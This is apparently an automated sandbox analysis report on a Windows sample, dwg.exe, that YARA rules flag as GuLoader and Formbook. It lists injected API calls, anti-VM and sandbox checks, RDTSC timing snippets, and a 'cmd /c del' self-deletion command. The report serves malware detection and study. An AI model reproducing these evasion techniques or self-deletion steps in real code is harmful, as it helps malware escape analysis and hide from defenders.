Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04509860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04509910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_045099A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04509A50 NtCreateFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04509560 NtWriteFile,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0450AD30 NtSetContextThread,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04509520 NtWaitForSingleObject,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_045095F0 NtQueryInformationFile,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04509670 NtQueryInformationProcess,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04509610 NtEnumerateValueKey,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0450A770 NtOpenThread,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04509770 NtSetInformationFile,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04509760 NtOpenProcess,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0450A710 NtOpenProcessToken,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04509730 NtQueryVirtualMemory,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_045097A0 NtUnmapViewOfSection,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0450B040 NtSuspendThread,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04509820 NtEnumerateKey,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_045098F0 NtReadVirtualMemory,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_045098A0 NtWriteVirtualMemory,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04509950 NtQueueApcThread,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_045099D0 NtCreateProcessEx,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04509A10 NtQuerySection,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04509A00 NtProtectVirtualMemory,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04509A20 NtResumeThread,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04509A80 NtOpenDirectoryObject,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04509B00 NtSetValueKey,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0450A3B0 NtGetContextThread,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_02378290 NtReadFile,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_02378310 NtClose,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_023783C0 NtAllocateVirtualMemory,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_023781E0 NtCreateFile,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_02378235 NtCreateFile,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0237828A NtReadFile,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0237830B NtClose,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0237819A NtCreateFile,
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_023781DC NtCreateFile,
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E1CD616
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E126E30
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E1D2EF7
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E1D1FF1
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E11841F
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E1CD466
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E1D2D07
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E100D20
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E1D1D55
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E132581
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E1D25DD
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E11D5E0
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E1D22AE
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E1D2B28
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E13EBB0
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E1CDBD2
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E1C1002
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E11B090
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E1320A0
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E1D20A8
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E1D28EC
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E10F900
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E124120
      Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_0458D466
      Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_044D841F
      Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04591D55
      Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04592D07
      Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_044C0D20
      Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_045925DD
      Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_044DD5E0
      Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_044F2581
      Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_0458D616
      Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_044E6E30
      Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04592EF7
      Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_0459DFCE
      Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04591FF1
      Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04581002
      Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_0459E824
      Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_045928EC
      Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_044DB090
      Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_044F20A0
      Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_045920A8
      Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_044CF900
      Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_044E4120
      Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_045922AE
      Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04592B28
      Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_045803DA
      Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_0458DBD2
      Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_044FEBB0
      Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_0237C73F
      Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_02362FB0
      Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_0237C7B8
      Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_02368C70
      Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_02368C6C
      Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_02362D90
      Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_02362D88
      Source: C:\Users\user\Desktop\dwg.exe | Code function: String function: 1E10B150 appears 35 times
      Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: String function: 044CB150 appears 35 times
      Source: dwg.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: dwg.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: dwg.exe, 00000000.00000000.194437867.0000000000416000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameradikalitete.exe vs dwg.exe
      Source: dwg.exe, 00000000.00000002.222283199.00000000020E0000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameradikalitete.exeFE2XNETVRKBOLSJ vs dwg.exe
      Source: dwg.exe, 00000000.00000002.222251197.00000000020A0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameuser32j% vs dwg.exe
      Source: dwg.exe, 00000004.00000003.290766684.000000000084D000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameCMMON32.exe` vs dwg.exe
      Source: dwg.exe, 00000004.00000000.220845134.0000000000416000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameradikalitete.exe vs dwg.exe
      Source: dwg.exe, 00000004.00000002.297131213.000000001E38F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs dwg.exe
      Source: dwg.exe, 00000004.00000002.296365706.000000001DC50000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemswsock.dll.muij% vs dwg.exe
      Source: dwg.exe | Binary or memory string: OriginalFilenameradikalitete.exe vs dwg.exe
      Source: dwg.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: 0000000A.00000002.461717156.00000000026E4000.00000004.00000020.sdmp, type: MEMORY | Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000004.00000002.291759356.0000000000080000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000004.00000002.291759356.0000000000080000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000004.00000002.296448526.000000001DEB0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000004.00000002.296448526.000000001DEB0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000A.00000002.460585611.00000000001E0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000A.00000002.460585611.00000000001E0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000A.00000002.461025057.0000000002360000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000A.00000002.461025057.0000000002360000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000A.00000002.463830371.00000000049D7000.00000004.00000001.sdmp, type: MEMORY | Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/0@13/8
      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6684:120:WilError_01
      Source: C:\Users\user\Desktop\dwg.exe | File created: C:\Users\user\AppData\Local\Temp\~DF2F905925E4C61327.TMP
      Source: dwg.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\dwg.exe | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: C:\Users\user\Desktop\dwg.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: dwg.exe | ReversingLabs: Detection: 17%
      Source: unknown | Process created: C:\Users\user\Desktop\dwg.exe 'C:\Users\user\Desktop\dwg.exe'
      Source: unknown | Process created: C:\Users\user\Desktop\dwg.exe 'C:\Users\user\Desktop\dwg.exe'
      Source: unknown | Process created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
      Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\dwg.exe'
      Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\dwg.exe | Process created: C:\Users\user\Desktop\dwg.exe 'C:\Users\user\Desktop\dwg.exe'
      Source: C:\Windows\SysWOW64\cmmon32.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\dwg.exe'
      Source: Binary string: cmmon32.pdb source: dwg.exe, 00000004.00000003.290766684.000000000084D000.00000004.00000001.sdmp
      Source: Binary string: cmmon32.pdbGCTL source: dwg.exe, 00000004.00000003.290766684.000000000084D000.00000004.00000001.sdmp
      Source: Binary string: wntdll.pdbUGP source: dwg.exe, 00000004.00000002.296549952.000000001E0E0000.00000040.00000001.sdmp, cmmon32.exe, 0000000A.00000002.463015429.00000000045BF000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: dwg.exe, cmmon32.exe

      Data Obfuscation:

      Yara detected GuLoader
      Source: Yara match | File source: Process Memory Space: dwg.exe PID: 6696, type: MEMORY
      Source: Yara match | File source: Process Memory Space: dwg.exe PID: 6408, type: MEMORY
      Yara detected VB6 Downloader Generic
      Source: Yara match | File source: Process Memory Space: dwg.exe PID: 6696, type: MEMORY
      Source: Yara match | File source: Process Memory Space: dwg.exe PID: 6408, type: MEMORY
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_004092D0 pushad ; retf
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_1E15D0D1 push ecx; ret
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_00563E67 push cs; ret
      Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_0451D0D1 push ecx; ret
      Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_0237533F push FFFFFF96h; ret
      Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_0236C32F push es; ret
      Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_0237B3D5 push eax; ret
      Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_0237583D push 0000003Fh; ret
      Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_0237CE0D push ss; retf
      Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_0236CF58 push ecx; ret
      Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_0237B422 push eax; ret
      Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_0237B42B push eax; ret
      Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_0237B48C push eax; ret
      Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_02375CD9 push C872E20Ah; retf
      Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_02375D64 push edx; ret
      Source: C:\Users\user\Desktop\dwg.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\dwg.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\dwg.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\dwg.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\dwg.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\dwg.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\dwg.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\cmmon32.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      Contains functionality to detect hardware virtualization (CPUID execution measurement)
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E07DA CloseServiceHandle,TerminateProcess,
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E1E0E
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E0A0C CloseServiceHandle,TerminateProcess,
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E082E CloseServiceHandle,TerminateProcess,
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E1870 NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E0668 CloseServiceHandle,TerminateProcess,
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E2E68 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E0A8E CloseServiceHandle,TerminateProcess,
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E0884 CloseServiceHandle,TerminateProcess,
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E1E84
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E2EB3
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E2EAB
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E2ECE
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E08C2 CloseServiceHandle,TerminateProcess,
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E06F6 CloseServiceHandle,TerminateProcess,
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E1D02
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E093A CloseServiceHandle,TerminateProcess,
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E072E CloseServiceHandle,TerminateProcess,
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E0921 CloseServiceHandle,TerminateProcess,
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E2F52
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E0772 CloseServiceHandle,TerminateProcess,
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E0996 CloseServiceHandle,TerminateProcess,
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E1DAE
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E1DA9
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E07A7 CloseServiceHandle,TerminateProcess,
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E21D6 NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_00562154 TerminateThread,
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_005620CA TerminateThread,
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_005621D6
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_00562180 TerminateThread,
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_005621A2
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_00562ECE
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_00562EB3
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_00562EAB
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 4_2_00562F52
      Detected RDTSC dummy instruction sequence (likely for instruction hammering)
      Source: C:\Users\user\Desktop\dwg.exe | RDTSC instruction interceptor: First address: 00000000021E029E second address: 00000000021E029E instructions:
      Source: C:\Users\user\Desktop\dwg.exe | RDTSC instruction interceptor: First address: 00000000021E307B second address: 00000000021E307B instructions:
      Source: C:\Users\user\Desktop\dwg.exe | RDTSC instruction interceptor: First address: 00000000021E3204 second address: 00000000021E3204 instructions:
      Source: C:\Users\user\Desktop\dwg.exe | RDTSC instruction interceptor: First address: 00000000021E09D2 second address: 00000000021E09D2 instructions:
      Source: C:\Users\user\Desktop\dwg.exe | RDTSC instruction interceptor: First address: 00000000005632DC second address: 00000000005632DC instructions:
      Source: C:\Users\user\Desktop\dwg.exe | RDTSC instruction interceptor: First address: 0000000000561EC6 second address: 0000000000561EC6 instructions:
      Source: C:\Users\user\Desktop\dwg.exe | RDTSC instruction interceptor: First address: 0000000000562170 second address: 0000000000562170 instructions:
      Tries to detect Any.run
      Source: C:\Users\user\Desktop\dwg.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\dwg.exe | File opened: C:\Program Files\qga\qga.exe
      Source: C:\Users\user\Desktop\dwg.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\dwg.exe | File opened: C:\Program Files\qga\qga.exe
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      Source: dwg.exe | Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Tries to detect virtualization through RDTSC time measurements
      Source: C:\Users\user\Desktop\dwg.exe | RDTSC instruction interceptor: First address: 00000000021E029E second address: 00000000021E029E instructions:
      Source: C:\Users\user\Desktop\dwg.exe | RDTSC instruction interceptor: First address: 00000000021E307B second address: 00000000021E307B instructions:
      Source: C:\Users\user\Desktop\dwg.exe | RDTSC instruction interceptor: First address: 00000000021E3204 second address: 00000000021E3204 instructions:
      Source: C:\Users\user\Desktop\dwg.exe | RDTSC instruction interceptor: First address: 00000000021E639F second address: 00000000021E639F instructions:
            0x00000000 rdtsc
            0x00000002 lfence
            0x00000005 shl edx, 20h
            0x00000008 or edx, eax
            0x0000000a popad
            0x0000000b xor dword ptr [eax], edx
            0x0000000d add eax, 04h
            0x00000010 cmp eax, ebx
            0x00000012 jne 00007F95DCE5AF6Ch
            0x00000014 jmp 00007F95DCE5AFBEh
            0x00000016 pushad
            0x00000017 lfence
            0x0000001a rdtsc
      Source: C:\Users\user\Desktop\dwg.exe | RDTSC instruction interceptor: First address: 00000000021E09D2 second address: 00000000021E09D2 instructions:
      Source: C:\Users\user\Desktop\dwg.exe | RDTSC instruction interceptor: First address: 000000000056639F second address: 000000000056639F instructions:
            0x00000000 rdtsc
            0x00000002 lfence
            0x00000005 shl edx, 20h
            0x00000008 or edx, eax
            0x0000000a popad
            0x0000000b xor dword ptr [eax], edx
            0x0000000d add eax, 04h
            0x00000010 cmp eax, ebx
            0x00000012 jne 00007F95DCE5AF6Ch
            0x00000014 jmp 00007F95DCE5AFBEh
            0x00000016 pushad
            0x00000017 lfence
            0x0000001a rdtsc
      Source: C:\Users\user\Desktop\dwg.exe | RDTSC instruction interceptor: First address: 00000000005632DC second address: 00000000005632DC instructions:
      Source: C:\Users\user\Desktop\dwg.exe | RDTSC instruction interceptor: First address: 0000000000561EC6 second address: 0000000000561EC6 instructions:
      Source: C:\Users\user\Desktop\dwg.exe | RDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions:
            0x00000000 rdtsc
            0x00000002 xor ecx, ecx
            0x00000004 add ecx, eax
            0x00000006 rdtsc
      Source: C:\Users\user\Desktop\dwg.exe | RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions:
            0x00000000 rdtsc
            0x00000002 xor ecx, ecx
            0x00000004 add ecx, eax
            0x00000006 rdtsc
      Source: C:\Users\user\Desktop\dwg.exe | RDTSC instruction interceptor: First address: 0000000000562170 second address: 0000000000562170 instructions:
      Source: C:\Windows\SysWOW64\cmmon32.exe | RDTSC instruction interceptor: First address: 00000000023685F4 second address: 00000000023685FA instructions:
            0x00000000 rdtsc
            0x00000002 xor ecx, ecx
            0x00000004 add ecx, eax
            0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\cmmon32.exe | RDTSC instruction interceptor: First address: 000000000236898E second address: 0000000002368994 instructions:
            0x00000000 rdtsc
            0x00000002 xor ecx, ecx
            0x00000004 add ecx, eax
            0x00000006 rdtsc
      Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021E6233 rdtsc
      Source: C:\Windows\explorer.exe TID: 6896 | Thread sleep time: -40000s >= -30000s
      Source: C:\Windows\SysWOW64\cmmon32.exe TID: 6888 | Thread sleep time: -40000s >= -30000s
      Source: C:\Windows\explorer.exe | Last function: Thread delayed
      Source: C:\Windows\SysWOW64\cmmon32.exe | Last function: Thread delayed
      Source: C:\Windows\SysWOW64\cmmon32.exe | Last function: Thread delayed
      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
      Source: dwg.exe, 00000004.00000003.252823162.0000000000846000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW*CkF
      Source: explorer.exe, 00000005.00000000.274508758.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
      Source: explorer.exe, 00000005.00000000.274508758.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
      Source: explorer.exe, 00000005.00000000.274271564.0000000008640000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000005.00000000.273860626.0000000008220000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
      Source: explorer.exe, 00000005.00000000.277858620.000000000F59B000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}i
      Source: dwg.exe, 00000004.00000003.252823162.0000000000846000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
      Source: explorer.exe, 00000005.00000000.266925690.00000000055D0000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
